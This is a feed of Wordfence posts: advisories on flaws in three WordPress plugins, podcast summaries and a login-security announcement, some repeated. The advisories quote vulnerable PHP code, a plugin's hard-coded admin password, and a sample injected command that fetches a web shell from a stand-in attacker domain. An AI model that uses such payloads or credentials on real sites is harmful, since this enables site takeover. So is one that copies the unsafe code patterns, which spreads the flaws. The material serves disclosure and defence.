Critical Vulnerability Patched in Popular Convert Plus Plugin

Description: Unauthenticated Administrator Creation
CVSS v3.0 Score: 10.0 (Critical)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Affected Plugin: Convert Plus
Plugin Slug: convertplug
Affected Versions: <= 3.4.2
Patched Version: 3.4.3

On Friday May 24th, our Threat Intelligence team identified a vulnerability present in Convert Plus, a commercial WordPress plugin with an estimated 100,000 active installs. This flaw allowed unauthenticated attackers to register new accounts with arbitrary user roles, up to and including Administrator accounts. We disclosed this issue privately to the plugin’s development team, who released a patch just a few days later.

Convert Plus (formerly convertplug) versions up to 3.4.2 are vulnerable to attacks against this flaw. All Convert Plus users should update to version 3.4.3 immediately, as this is a critical security issue. We have released a firewall rule to protect Wordfence Premium users who may not be able to update yet, but we still recommend installing the patch. Free users will receive the new rule after thirty days.

Vulnerability In Detail

Convert Plus is a lead generation plugin used to display marketing popups, info bars, and other elements to a site’s visitors with various calls-to-action like email subscription and coupon codes. When setting up a form for handling new subscribers, administrators can define a WordPress user role to be associated with the email address provided. By default this value is None and no user is created, but the site’s owner can have these forms create new Subscriber accounts, or any other role they’d like. The exception is the Administrator role: the plugin removes it from the list of available roles when generating the dropdown menu.

global $wp_roles;
$roles    = $wp_roles->get_names();
$user_arr = array();
foreach ( $roles as $rkey => $rvalue ) {
	$user_arr [ $rvalue ] = $rvalue;
}
$first_item = array( 'None' );
$new_arr    = $user_arr;
unset( $new_arr['Administrator'] );
$new_arr = $first_item + $new_arr;

However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user. Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.

// Add subscriber as new user role to site.
$new_role = isset( $_POST['cp_set_user'] ) ? $_POST['cp_set_user'] : 'None';

if ( 'success' === $status && ! $only_conversion ) {

	if ( '1' === $sub_optin || 1 === $sub_optin ) {
		$list_name  = str_replace( 'cp_connects_', '', $data_option );
		$list_name  = str_replace( '_', ' ', $list_name );
		$page_url   = isset( $cp_settings['cp-page-url'] ) ? $cp_settings['cp-email-body'] : '';
		$style_name = isset( $_POST['cp_module_name'] ) ? esc_attr( $_POST['cp_module_name'] ) : '';
		cp_notify_sub_to_admin( $list_name, $param, $sub_email, $email_sub, $email_body, $cp_page_url, $style_name );
	}
	if ( '' !== $new_role && ( 'None' !== $new_role && 'none' !== $new_role ) ) {
		cp_add_new_user_role( $param, $new_role );
	}
}

This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.

Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address. The new account is given a randomized password, but the attacker can issue a typical password reset to gain access to their rogue administrator account.

Video Demonstration

Convert Plus Plugin Vulnerability Exploit Demonstration from Wordfence on Vimeo.

Disclosure Timeline

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.

Well-Handled Response

Vulnerability disclosures are an unfortunate necessity, and it’s important that they’re handled appropriately by all parties involved. In recent disclosures, we’ve seen a variety of responses from the developers we’ve reached out to. For example, in January we received no response at all from a disclosure regarding the Total Donations plugin. More recently was this week’s Slick Popup vulnerability, which had been acknowledged by the developers but remains unpatched.

Conversely, the response from Convert Plus’s team was an excellent example of how to handle a vulnerability disclosure. They responded quickly to our contact, and issued a patch for the flaw within just a few days. Once the patch went live, they published their own blog post alerting their users that an important update was available. They even highlighted the update on the plugin’s CodeCanyon page.

Convert Plus’s CodeCanyon page, featuring an alert regarding the security release.

Conclusion

In this post we shared details of a critical security flaw recently patched in the popular Convert Plus plugin for WordPress. This vulnerability has been patched as of version 3.4.3 of the plugin, and it’s crucial that all affected users patch as soon as possible. We have released a firewall rule which prevents exploits against Wordfence Premium users, which will be available to free users on June 27th.

As always, we will monitor our network for activity associated with this flaw and will update you with any noteworthy campaigns we identify.

The post Critical Vulnerability Patched in Popular Convert Plus Plugin appeared first on Wordfence.

Read More

Privilege Escalation Flaw Present In Slick Popup Plugin

In April, our Threat Intelligence team identified a privilege escalation flaw present in the latest version of Slick Popup, a WordPress plugin with approximately 7,000 active installs. We notified the developers, a firm called Om Ak Solutions, who acknowledged the issue and informed us that a patch would be released.

Per our disclosure policy, we allowed 30 days for resolution of this issue before releasing details to the public. Unfortunately, the deadline has passed without a satisfactory patch by the plugin’s developers. At this time, all version of Slick Popup up to 1.7.1 are vulnerable.

In this post we’ll look at the vulnerability in question and what you should do if you’re making use of the plugin.

Subscriber+ Privilege Escalation Flaw In Support Access Feature

One feature of Slick Popup is the ability to grant support access to the plugin’s developers, Om Ak Solutions, with one click in the dashboard. This generates a new administrator account and sends an email to Om Ak Solutions with details. Two issues in this process combine to create the privilege escalation vulnerability in question.

// ADD NEW ADMIN USER TO WORDPRESS
// ----------------------------------
// Put this file in your WordPress root directory and run it from your browser.
// Delete it when you're done.
//require_once(ABSPATH . 'wp-blog-header.php');
//require_once(ABSPATH . 'wp-includes/registration.php');
// ----------------------------------------------------
// CONFIG VARIABLES
// Make sure that you set these before running the file.
$newusername = 'slickpopupteam';
$newpassword = 'OmakPass13#';
$newemail = 'poke@slickpopup.com';
// ----------------------------------------------------
// This is just a security precaution, to make sure the above "Config Variables" 
// have been changed from their default values.
if ( $newpassword != 'YOURPASSWORD' &&
	 $newemail != 'YOUREMAIL@TEST.com' &&
	 $newusername !='YOURUSERNAME' )
{
	// Check that user doesn't already exist
	if ( !username_exists($newusername) && !email_exists($newemail) )
	{
		// Create user and set role to administrator
		$user_id = wp_create_user( $newusername, $newpassword, $newemail);
		if ( is_int($user_id) )
		{
			$wp_user_object = new WP_User($user_id);
			$wp_user_object->set_role('administrator');

First, the credentials associated with this new administrative account are hard-coded into the plugin. When the user is created, it will have the username slickpopupteam and its password is OmakPass13#. Since this is a known value in all cases, it’s possible for malicious actors to assemble a list of sites making use of the plugin and occasionally test for the presence of this support user. Once logged in, they’re free to create other backdoors independent of this user.

add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );
function action_splite_support_access() {
	$ajaxy = array(); 
	$errors = array(); 
	
	$todo = (isset($_POST['todo']) AND !empty($_POST['todo'])) ? $_POST['todo'] : 'createuser'; 

However, attackers with at least Subscriber access to an affected site can create this user on their own. Since the AJAX action used to generate this user doesn’t contain any capabilities checks, it can be accessed by any logged-in user. This, combined with the hard-coded credentials in the plugin, means any user with an account can grant themselves administrative access and take over a site.

During our research we identified that the user creation script used by this plugin is somewhat popular, and can be found in several GitHub gists like this one. We searched the WordPress.org plugin repository for other uses of this script and found another one of Om Ak Solution’s plugins, Contact Form 7 Spam Blocker. We included this additional plugin in our report to the developer.

Private Disclosure Timeline

  • April 22 – Vulnerability disclosed to Om Ak Solutions.
  • April 25 – WAF rule released to protect Wordfence Premium users from attacks on this flaw.
  • April 27 – Developer acknowledges issue and states a patch will be released
  • May 14 – Slick Popup version 1.7.1 released – issue unresolved in this patch.
  • May 22 – Public disclosure deadline.
  • May 25 – WAF rule released for free users.

Shortly before the writing of this article, a representative of Om Ak Solutions claimed a patch has been released for the Pro version of Slick Popup and that a patch for the free version is in progress. The reported patch of the Pro version has not been tested by the Wordfence team at this time.

Next Steps

As mentioned above, Slick Popup versions up to and including 1.7.1 are vulnerable. It is our recommendation that users of the plugin deactivate or delete the plugin until a patch is available.

However, it’s possible to deactivate the vulnerable Support Access feature on current versions of the plugin without affecting the rest of the plugin’s functionality. Doing this requires making a small change to the plugin’s files, and you should note a few things beforehand:

  • This will break the plugin’s ability to grant support access to Om Ak Solutions.
  • Any updates to the plugin will overwrite this change and reactivate the feature.
  • This will not remove an existing slickpopupteam user, legitimate or otherwise. That will need to be done manually if one is present.
  • We cannot provide support for implementing this short-term fix, nor can we assist with other issues that may arise during the process.

To prevent the creation of these users, all you need to do is comment out the line where the action_splite_support_access AJAX action is registered. In the latest version of the plugin, this is on line 523 of the file /libs/admin-pages.php.

Before:

add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );

After:

//add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );

Conclusion

In this post, we detailed an unpatched privilege escalation flaw in the Slick Popup plugin which allows subscribers to gain administrative access to an affected WordPress site. Because of the relatively small userbase of the plugin, and the authentication necessary to exploit it, we do not anticipate widespread attack campaigns leveraging this vulnerability. A Firewall rule to protect against attempts to exploit this vulnerability was released on April 25th and is currently available for sites running Wordfence Premium as well as the free version.

The post Privilege Escalation Flaw Present In Slick Popup Plugin appeared first on Wordfence.

Read More

OS Command Injection Vulnerability Patched In WP Database Backup Plugin

Toward the end of April, an unnamed security researcher published details of an unpatched vulnerability in WP Database Backup, a WordPress plugin with over 70,000 users. The vulnerability, which was irresponsibly disclosed to the public before attempting to notify the plugin’s developers, was reported as a plugin configuration change flaw. A proof of concept (PoC) exploit was provided which allowed unauthenticated attackers to modify the destination email address for database backups, potentially putting sensitive information in their hands.

Upon further review by our Threat Intelligence team, we determined the scope of this flaw was more severe in reality. In unpatched versions of WP Database Backup, an attacker is able to inject operating system (OS) commands arbitrarily, which are then executed when the plugin performs a database backup. Injected commands would persist until manually removed, executing each time a backup is run.

We immediately notified the plugin’s developer of this issue and deployed a new firewall rule to prevent Wordfence users from exploitation of these vulnerabilities. The vulnerabilities have been patched as of version 5.2 of WP Database Backup.

Plugin Configuration Change Vulnerability

The originally disclosed vulnerability present in WP Database Backup allows an attacker to modify a limited selection of the plugin’s internal settings. These settings were vulnerable due to inconsistencies in the way security features were added to the code–in some cases, a capabilities check would be performed or a CSRF nonce would be required, but other cases weren’t protected by these efforts.

In particular, a nonce check was required when the wp-database-backup page of a site’s admin dashboard was accessed. Unfortunately, the function used by the plugin to check for and perform settings changes was hooked into admin_init, not tied to the plugin’s own page in the dashboard. The vulnerable code would still execute on any other page under /wp-admin, allowing the nonce check to be bypassed.

if (isset($_POST['wpsetting'])) {
    if (isset($_POST['wp_local_db_backup_count'])) {
        update_option('wp_local_db_backup_count', esc_attr(sanitize_text_field($_POST['wp_local_db_backup_count'])));
    }
    if (isset($_POST['wp_db_log'])) {
        update_option('wp_db_log', 1);
    } else {
        update_option('wp_db_log', 0);
    }
    if (isset($_POST['wp_db_remove_local_backup'])) {
        update_option('wp_db_remove_local_backup', 1);
    } else {
        update_option('wp_db_remove_local_backup', 0);
    }

    if (isset($_POST['wp_db_backup_enable_htaccess'])) {
        update_option('wp_db_backup_enable_htaccess', 1);
    } else {
        update_option('wp_db_backup_enable_htaccess', 0);
        $path_info = wp_upload_dir();
        @unlink($path_info['basedir'] . '/db-backup/.htaccess');
    }


    if (isset($_POST['wp_db_exclude_table'])) {
        update_option('wp_db_exclude_table', $_POST['wp_db_exclude_table']);
    } else {
        update_option('wp_db_exclude_table', '');
    }
}
if (isset($_POST['wp_db_backup_email_id'])) {

    update_option('wp_db_backup_email_id', esc_attr(sanitize_text_field($_POST['wp_db_backup_email_id'])));
}
if (isset($_POST['wp_db_backup_email_attachment'])) {
    $email_attachment = sanitize_text_field($_POST['wp_db_backup_email_attachment']);
    update_option('wp_db_backup_email_attachment',esc_attr($email_attachment));
}
if (isset($_POST['Submit']) && $_POST['Submit'] == 'Save Settings') {
    if (isset($_POST['wp_db_backup_destination_Email'])) {
        update_option('wp_db_backup_destination_Email', 1);
    } else {
        update_option('wp_db_backup_destination_Email', 0);
    }
}

The entire code block above would run without any security checks on any admin-facing page other than the plugin’s own settings page. Since endpoints like /wp-admin/admin-post.php will trigger admin_init and return true for is_admin for unauthenticated users, an attacker can exploit this code without logging in. The original report drew attention to the email settings, which can be toggled for the plugin to send database backup files via email to a given address. In vulnerable versions, this can be switched on and pointed to an attacker-controlled address to obtain sensitive information from the site’s database.

OS Command Injection in Excluded Table Settings

One of the features in WP Database Backup allows users to define tables to be excluded from backups. These excluded tables are stored as an array, which is accessed when a new backup is performed.

public function mysqldump($SQLfilename)
{

    $this->mysqldump_method = 'mysqldump';

    //$this->do_action( 'mysqldump_started' );

    $host = explode(':', DB_HOST);

    $host = reset($host);
    $port = strpos(DB_HOST, ':') ? end(explode(':', DB_HOST)) : '';

    // Path to the mysqldump executable
    $cmd = escapeshellarg($this->get_mysqldump_command_path());

    // We don't want to create a new DB
    $cmd .= ' --no-create-db';

    // Allow lock-tables to be overridden
    if (!defined('WPDB_MYSQLDUMP_SINGLE_TRANSACTION') || WPDB_MYSQLDUMP_SINGLE_TRANSACTION !== false)
        $cmd .= ' --single-transaction';

    // Make sure binary data is exported properly
    $cmd .= ' --hex-blob';

    // Username
    $cmd .= ' -u ' . escapeshellarg(DB_USER);

    // Don't pass the password if it's blank
    if (DB_PASSWORD)
        $cmd .= ' -p' . escapeshellarg(DB_PASSWORD);

    // Set the host
    $cmd .= ' -h ' . escapeshellarg($host);

    // Set the port if it was set
    if (!empty($port) && is_numeric($port))
        $cmd .= ' -P ' . $port;

    // The file we're saving too
    $cmd .= ' -r ' . escapeshellarg($SQLfilename);

    $wp_db_exclude_table = array();
    $wp_db_exclude_table = get_option('wp_db_exclude_table');
    if (!empty($wp_db_exclude_table)) {
        foreach ($wp_db_exclude_table as $wp_db_exclude_table) {
            $cmd .= ' --ignore-table=' . DB_NAME . '.' . $wp_db_exclude_table;
            // error_log(DB_NAME.'.'.$wp_db_exclude_table);
        }
    }

    // The database we're dumping
    $cmd .= ' ' . escapeshellarg(DB_NAME);

    // Pipe STDERR to STDOUT
    $cmd .= ' 2>&1';
    // Store any returned data in an error
    
    $stderr = shell_exec($cmd);

    // Skip the new password warning that is output in mysql > 5.6
    if (trim($stderr) === 'Warning: Using a password on the command line interface can be insecure.') {
        $stderr = '';
    }

    if ($stderr) {
        $this->error($this->get_mysqldump_method(), $stderr);
        error_log($stderr);
    }

    return $this->verify_mysqldump($SQLfilename);
}

The backups themselves are performed by building a mysqldump command to be executed via shell_exec. The plugin uses its own settings and the site’s database credentials to assemble the full command, including the array of excluded tables.

$wp_db_exclude_table = array();
$wp_db_exclude_table = get_option('wp_db_exclude_table');
if (!empty($wp_db_exclude_table)) {
    foreach ($wp_db_exclude_table as $wp_db_exclude_table) {
        $cmd .= ' --ignore-table=' . DB_NAME . '.' . $wp_db_exclude_table;
        // error_log(DB_NAME.'.'.$wp_db_exclude_table);
    }
}

As seen in the relevant snippet above, the array of excluded tables is iterated over to append --ignore-table= arguments to the final mysqldump command. However, since these values are inserted directly into an OS command without sanitization, and an attacker can modify the values of this array by exploiting the configuration change vulnerability above, this can be abused to execute arbitrary commands on the site’s host server.

The simplest way to demonstrate this flaw is via a basic Bash subshell. If, for instance, an attacker has defined the value $(wget evildomain.com/shell.txt -O shell.php) as an “excluded table”, then the commands within the parentheses will be executed before the actual mysqldump command (which will most likely fail, since the returned value from the subshell would be invalid for an --ignore-table argument). In this example, a malicious PHP shell would be pulled down from the attacker’s site and stored as “shell.php” on the victim’s server. This would happen every time a backup was performed with the plugin, either manually or scheduled, until the site’s owner reset the excluded table configuration.

Disclosure Timeline

  • April 24 – Original public disclosure of configuration change flaw. Wordfence identifies OS command injection flaw and reaches out to developer.
  • April 25 – Wordfence releases firewall rule to Premium users to prevent exploitation of both flaws.
  • April 27 – Developer acknowledges issue.
  • April 30 – Patch released
  • May 25 – Firewall rule released for free users.

Conclusion

In today’s post, we detailed a previously undisclosed OS command injection flaw present in the WP Database Backup plugin. This flaw has been patched as of version 5.2 and we recommend affected users ensure they’ve updated to the latest available version. Sites running Wordfence Premium have been protected from exploitation of these flaws since April 24th. Sites running the free version received the firewall rule update on May 25th.

The post OS Command Injection Vulnerability Patched In WP Database Backup Plugin appeared first on Wordfence.

Read More

Podcast Episode 16: Cami Kaos talks WordCamps, Meetups and Community


If you’ve ever attended a WordCamp or a WordPress meetup in the last 6 years, that community experience was based on the guidance and support from WordCamp Central and Community Manager Cami Kaos. Cami is the primary contact for the 150 WordCamps and over 600 WordPress meetups taking place around the world this year. Her efforts ensure that the volunteers contributing to community events have what they need to succeed. Cami shares her thoughts on getting started with WordPress meetups and WordCamps, challenges facing the growing community, and how to get involved.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find me on Twitter as @mmaunder and Cami Kaos as @CamiKaos. You can learn more about getting involved with the WordPress community on make.wordpress.org. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 16: Cami Kaos talks WordCamps, Meetups and Community appeared first on Wordfence.

Read More

Podcast Episode 15: So. Much. News!!

In this week’s news we have a lot to cover. We talk about an intrusion at StackOverflow, a proposal to modify the WordPress plugin guidelines, how Chinese hackers are getting better at stealing US cyber secrets, ethical issues of firms promising ransomware solutions that only include paying the ransomware, a breach on the Joomla extension directory server, Google’s aggregation of your purchase receipts and suspension of Android support for Huawei amongst many other stories.

Here are approximate timestamps in case you want to jump around:
0:46 Code signing in WordPress 5.2
4:07 Stack Overflow intrusion
8:00 WordPress plugin guideline proposal
12:00 US cyber secrets being stolen by China
16:00 Ransomware solution
21:11 Joomla extension directory experienced an intrusion
24:40 Google aggregating purchase data
27:58 Google suspends Android support for Huawei
33:00 How effective is basic account hygiene at preventing hijacking
35:00 735K fraudulently obtained IP addresses revoked
38:29 Baltimore ransomware nightmare continues
43:01 460,000 user accounts breached on Uniqlo online
43:59 OGusers forum hacked

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find me on Twitter as @mmaunder and Kathy as @kathyzant. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 15: So. Much. News!! appeared first on Wordfence.

Read More

Podcast Episode 14: Interview with Trauma Surgeon and Plugin Dev Andy Fragen


 
Dr. Andy Fragen is a trauma/acute care surgeon as well as a prolific WordPress plugin author. One of his plugins, GitHub Updater, allows you to host WordPress plugins and themes on GitHub instead of WordPress.org. Andy supports numerous WordCamps and is an active member of the WordPress community in southern California. I had the pleasure of talking with Andy at WordCamp Orange County. He’s a fascinating person and I really think you’ll enjoy our conversation.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find me on Twitter as @mmaunder and Dr. Andy Fragen as @andyfragen. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 14: Interview with Trauma Surgeon and Plugin Dev Andy Fragen appeared first on Wordfence.

Read More

Podcast Episode 12: Major WhatsApp Vulnerability and Other News

This week in our news-focused episode we cover the WhatsApp zero-day vulnerability that allegedly was used to infect phones with malware by simply calling a phone with the app. We also announced a new update to the Wordfence plugin, making an updated two-factor authentication feature available to all Wordfence users. We cover a story about SIM hijacking and discuss why we need to move away from SMS 2-factor authentication. We also cover an ongoing supply-chain attack affecting thousands of sites, three antivirus companies that have been compromised, a malvertiser indictment and other stories.

Here are approximate timestamps in case you want to jump around:
0:30 WhatsApp voice calls used to inject malware
7:07 New Wordfence login security features
12:30 Ongoing supply-chain attack
18:58 SIM card hijacking campaign
22:05 Three US Antivirus companies compromised
23:55 Malvertiser compromised
30:12 Opting out of facial recognition at airports
32:48 Microsoft Word gets politically correct
37:38 Binance intrusion
41:25 Federal agencies spending millions to hack into phones

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find me on Twitter as @mmaunder and Kathy as @kathyzant. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 12: Major WhatsApp Vulnerability and Other News appeared first on Wordfence.

Read More

Podcast Episode 12: Major WhatsApp Vulnerability and Other News

This week in our news-focused episode we cover the WhatsApp zero-day vulnerability that allegedly was used to infect phones with malware by simply calling a phone with the app. We also announced a new update to the Wordfence plugin, making an updated two-factor authentication feature available to all Wordfence users. We cover a story about SIM hijacking and discuss why we need to move away from SMS 2-factor authentication. We also cover an ongoing supply-chain attack affecting thousands of sites, three antivirus companies that have been compromised, a malvertiser indictment and other stories.

Here are approximate timestamps in case you want to jump around:
0:30 WhatsApp voice calls used to inject malware
7:07 New Wordfence login security features
12:30 Ongoing supply-chain attack
18:58 SIM card hijacking campaign
22:05 Three US Antivirus companies compromised
23:55 Malvertiser compromised
30:12 Opting out of facial recognition at airports
32:48 Microsoft Word gets politically correct
37:38 Binance intrusion
41:25 Federal agencies spending millions to hack into phones

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find me on Twitter as @mmaunder and Kathy as @kathyzant. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 12: Major WhatsApp Vulnerability and Other News appeared first on Wordfence.

Read More

Announcing 3 New Login Security Features

Spend any time looking at blocked attacks in Wordfence Live Traffic and you’ll walk away worried about login security. WordPress sites are under constant attack by bots attempting to guess your users’ passwords. A lot of these attacks simply test lists of commonly used passwords along with usernames they think you may have chosen, like ‘admin’ or different takes on your domain name.

More recently we’ve started to see more sophisticated attackers leveraging lists of passwords from data breaches in their attacks. These are referred to as credential stuffing attacks and have a much higher success rate than traditional password guessing attacks. If you’ve given other users access to your website, are you confident that they haven’t reused their password? If they have, you may be just one data breach away from a hacked website.

Today, with the release of Wordfence 7.3.1, we are excited to announce several new login security features! They are:

  • A completely rebuilt two-factor authentication feature, now available in the free version of Wordfence
  • Login page CAPTCHA
  • Improved XML-RPC protection

Together with the other login security features already included in Wordfence, these additions give you robust, layered protection from password guessing and credential stuffing attacks.

Completely Rebuilt Two-Factor Authentication Feature

Two-factor authentication, or 2FA, adds a second layer of security to your users’ accounts. It requires them to not only enter their password, but also a second piece of information only they have access to. An account protected by 2FA is virtually impossible to compromise. Even if an attacker discovers your username and password somehow, they still can’t log in.

Setting up 2FA is easy! Just scan the barcode with your authenticator app and enter a login code.

Use Any TOTP-Based Authenticator App

The new Wordfence 2FA feature leverages authenticator applications and services that support the time-based one-time password (TOTP) standard. There are many of them to choose from on the market; Google Authenticator, Authy, FreeOTP and 1Password are just a few. Many of you are probably already using one of these. For those who aren’t, they are incredibly easy to set up and use.

After entering your password, you simply enter the 6 digit login code from your authenticator app.

Wordfence 2FA is Now Available For Free

2FA is now available for use on sites running both the free and Premium versions of Wordfence. When we first added 2FA to Wordfence roughly 6 years ago, we leveraged SMS to send you a text message with a 2FA code when logging in to your site. Since sending SMS messages costs money we made it a Premium-only feature. A couple years ago we added an authenticator app option in addition to SMS.

The previous iteration of our 2FA feature is now being phased out completely and the replacement no longer includes an SMS option. Sites with the old version activated are able to continue to use it, but are strongly encouraged to transition to the new one. SMS is a less secure way to deliver login codes and is prone to delivery issues. In fact, NIST now specifically recommends against using SMS-based authentication.

Enable 2FA For Any User Role You Want

While it’s most important to protect your site’s admin accounts, there are plenty of other user roles with capabilities you don’t want to hand over to an attacker. Wordfence now lets you enable 2FA for any role you like. Simply visit the Settings tab on the Login Security page within Wordfence.

Whitelisted IPs That Bypass 2FA

This field accepts IP addresses or ranges where 2FA will not be required. You can use this to skip 2FA on networks you trust, like if you have a static IP. Another example is if you have a network with a trusted range of IPs, such as allowing users on your corporate network to log in without 2FA unless they are logging in from outside the network.

New Login Page CAPTCHA Feature

In recent years the number of IoT devices has exploded. Unfortunately they have been highly prone to security vulnerabilities. This has resulted in a massive increase in the size of botnets available for attackers. In the context of login security for WordPress, this means that attackers have more compromised machines, and IPs, to use in their attacks. By spreading attacks across much larger pools of IP addresses they are able to dial the number of login attempts made by each IP address down so far that they evade even the most aggressive login attempt limiting rules, at least at the site level.

Earlier in the year we experienced an attack just like that, where the attacker was leveraging hundreds of thousands of IP addresses in a very sophisticated manner. We determined that in order to effectively thwart the attack our best option would have been deploy CAPTCHA protection on our  login page, effectively nullifying the attack.

As is often the case, a solution to a problem we’re facing with WordPress security becomes great product idea. You are now able to enable Google reCAPTCHA v3 on your login and registration pages using Wordfence. It does a fantastic job of blocking bots from attempting to log in while allowing humans through without incident.

As a fail-safe, any user that Google erroneously deems to be a bot (and who does not have 2FA active) may continue logging in by clicking a verification link in an email sent to the account’s email address. User registration attempts that are blocked may also send an email to the email address configured for site administration, which is rate limited to prevent abuse.

Improved XML-RPC Protection

XML-RPC is an interface that allows WordPress to communicate with other applications. It is unfortunately often overlooked by WordPress users when discussing login security. “Just move your login page and you’re secure!” they say with bravado. Unfortunately they are often wrong. In the last 30 days, 60.6% of the login attempts blocked by Wordfence were hitting XML-RPC, not the site’s login page.

Fortunately there is a way to secure XML-RPC as well, with the new login security features in Wordfence.

Disabling XML-RPC

Because XML-RPC is such a popular target for attackers, we strongly recommend that you figure out whether you need it or not. If you do, protect it with 2FA if possible. If you don’t use the WordPress app or the Jetpack plugin it is likely safe for you to disable XML-RPC.

If you don’t need it, disable it. Once you know it is safe to do so, disabling it is as easy as checking a box in your Wordfence settings. Just be aware that it may cause you problems in the future should you start using an app or plugin that requires it.

Two-Factor Authentication for XML-RPC

If you have a custom application that logs in via XML-RPC, it can be configured to append a TOTP code when logging in using Wordfence. This option allows you to protect your XML-RPC endpoint from brute force attacks while making it available for your custom app. Unfortunately most off-the-shelf plugins and apps that utilize XML-RPC cannot be configured to use 2FA just yet, but with Wordfence you’ll be ready for when they can.

Conclusion

In this age of massive botnets and constant data breaches, login security has become increasingly important. These new features combined with our existing ones will provide you with the tools you need to implement the layered security approach that will keep your site safe. We strongly recommend that you upgrade to the latest version of Wordfence if you haven’t done so already, and invest the time to enable these powerful new features.

Thanks and stay safe!

The post Announcing 3 New Login Security Features appeared first on Wordfence.

Read More

Announcing 3 New Login Security Features

Spend any time looking at blocked attacks in Wordfence Live Traffic and you’ll walk away worried about login security. WordPress sites are under constant attack by bots attempting to guess your users’ passwords. A lot of these attacks simply test lists of commonly used passwords along with usernames they think you may have chosen, like ‘admin’ or different takes on your domain name.

More recently we’ve started to see more sophisticated attackers leveraging lists of passwords from data breaches in their attacks. These are referred to as credential stuffing attacks and have a much higher success rate than traditional password guessing attacks. If you’ve given other users access to your website, are you confident that they haven’t reused their password? If they have, you may be just one data breach away from a hacked website.

Today, with the release of Wordfence 7.3.1, we are excited to announce several new login security features! They are:

  • A completely rebuilt two-factor authentication feature, now available in the free version of Wordfence
  • Login page CAPTCHA
  • Improved XML-RPC protection

Together with the other login security features already included in Wordfence, these additions give you robust, layered protection from password guessing and credential stuffing attacks.

Completely Rebuilt Two-Factor Authentication Feature

Two-factor authentication, or 2FA, adds a second layer of security to your users’ accounts. It requires them to not only enter their password, but also a second piece of information only they have access to. An account protected by 2FA is virtually impossible to compromise. Even if an attacker discovers your username and password somehow, they still can’t log in.

Setting up 2FA is easy! Just scan the barcode with your authenticator app and enter a login code.

Use Any TOTP-Based Authenticator App

The new Wordfence 2FA feature leverages authenticator applications and services that support the time-based one-time password (TOTP) standard. There are many of them to choose from on the market; Google Authenticator, Authy, FreeOTP and 1Password are just a few. Many of you are probably already using one of these. For those who aren’t, they are incredibly easy to set up and use.

After entering your password, you simply enter the 6 digit login code from your authenticator app.

Wordfence 2FA is Now Available For Free

2FA is now available for use on sites running both the free and Premium versions of Wordfence. When we first added 2FA to Wordfence roughly 6 years ago, we leveraged SMS to send you a text message with a 2FA code when logging in to your site. Since sending SMS messages costs money we made it a Premium-only feature. A couple years ago we added an authenticator app option in addition to SMS.

The previous iteration of our 2FA feature is now being phased out completely and the replacement no longer includes an SMS option. Sites with the old version activated are able to continue to use it, but are strongly encouraged to transition to the new one. SMS is a less secure way to deliver login codes and is prone to delivery issues. In fact, NIST now specifically recommends against using SMS-based authentication.

Enable 2FA For Any User Role You Want

While it’s most important to protect your site’s admin accounts, there are plenty of other user roles with capabilities you don’t want to hand over to an attacker. Wordfence now lets you enable 2FA for any role you like. Simply visit the Settings tab on the Login Security page within Wordfence.

Whitelisted IPs That Bypass 2FA

This field accepts IP addresses or ranges where 2FA will not be required. You can use this to skip 2FA on networks you trust, like if you have a static IP. Another example is if you have a network with a trusted range of IPs, such as allowing users on your corporate network to log in without 2FA unless they are logging in from outside the network.

New Login Page CAPTCHA Feature

In recent years the number of IoT devices has exploded. Unfortunately they have been highly prone to security vulnerabilities. This has resulted in a massive increase in the size of botnets available for attackers. In the context of login security for WordPress, this means that attackers have more compromised machines, and IPs, to use in their attacks. By spreading attacks across much larger pools of IP addresses they are able to dial the number of login attempts made by each IP address down so far that they evade even the most aggressive login attempt limiting rules, at least at the site level.

Earlier in the year we experienced an attack just like that, where the attacker was leveraging hundreds of thousands of IP addresses in a very sophisticated manner. We determined that in order to effectively thwart the attack our best option would have been deploy CAPTCHA protection on our  login page, effectively nullifying the attack.

As is often the case, a solution to a problem we’re facing with WordPress security becomes great product idea. You are now able to enable Google reCAPTCHA v3 on your login and registration pages using Wordfence. It does a fantastic job of blocking bots from attempting to log in while allowing humans through without incident.

As a fail-safe, any user that Google erroneously deems to be a bot (and who does not have 2FA active) may continue logging in by clicking a verification link in an email sent to the account’s email address. User registration attempts that are blocked may also send an email to the email address configured for site administration, which is rate limited to prevent abuse.

Improved XML-RPC Protection

XML-RPC is an interface that allows WordPress to communicate with other applications. It is unfortunately often overlooked by WordPress users when discussing login security. “Just move your login page and you’re secure!” they say with bravado. Unfortunately they are often wrong. In the last 30 days, 60.6% of the login attempts blocked by Wordfence were hitting XML-RPC, not the site’s login page.

Fortunately there is a way to secure XML-RPC as well, with the new login security features in Wordfence.

Disabling XML-RPC

